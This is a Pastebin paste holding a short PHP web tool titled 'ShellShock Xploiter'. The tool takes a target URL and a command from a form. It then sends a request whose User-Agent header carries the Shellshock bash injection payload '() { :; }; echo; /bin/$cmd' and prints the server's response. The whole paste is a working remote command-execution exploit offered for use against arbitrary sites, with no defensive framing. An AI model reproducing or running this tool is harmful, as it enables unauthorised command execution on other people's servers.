AgusSR

ShellShock Xploiter (WebBased)

May 30th, 2016
670
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <form method="post">
  3. Target: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/">
  4. <input type="text" name="cmd" size="50" height="10" placeholder="uname -a">
  5. <input type="submit" name="go" value="test">
  6. </form>
  7. </html>
  8. <?php
  9. // coded by Evoo [ http://pastebin.com/u/Evoo ]
  10. // recoded by Mr. Error 404 ( WebBased Xploiter )
  11. function pwn($site,$cmd) {
  12. $useragent =  "() { :; }; echo; /bin/$cmd";
  13. //$useragent =  "() { :; }; echo; /bin/uname";
  14. $ch = curl_init($site);
  15. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  17. $postResult = curl_exec($ch);
  18. print "<pre>";
  19. print_r("\t".$postResult);
  20. print "</pre>";
  21. /*if (eregi("Linux",$postResult)){
  22.     echo "[+]Vulnerable\n";
  23. }else{
  24.         echo "[-]Tidak Vuln\n";
  25. }
  26. */
  27. }
  28. $url = $_POST['url'];
  29. $cmd = $_POST['cmd'];
  30. $go = $_POST['go'];
  31. if(isset($go)) {
  32.     echo "=> $url<br>";
  33.     pwn($url, $cmd);
  34. }
  35. ?>
RAW Paste Data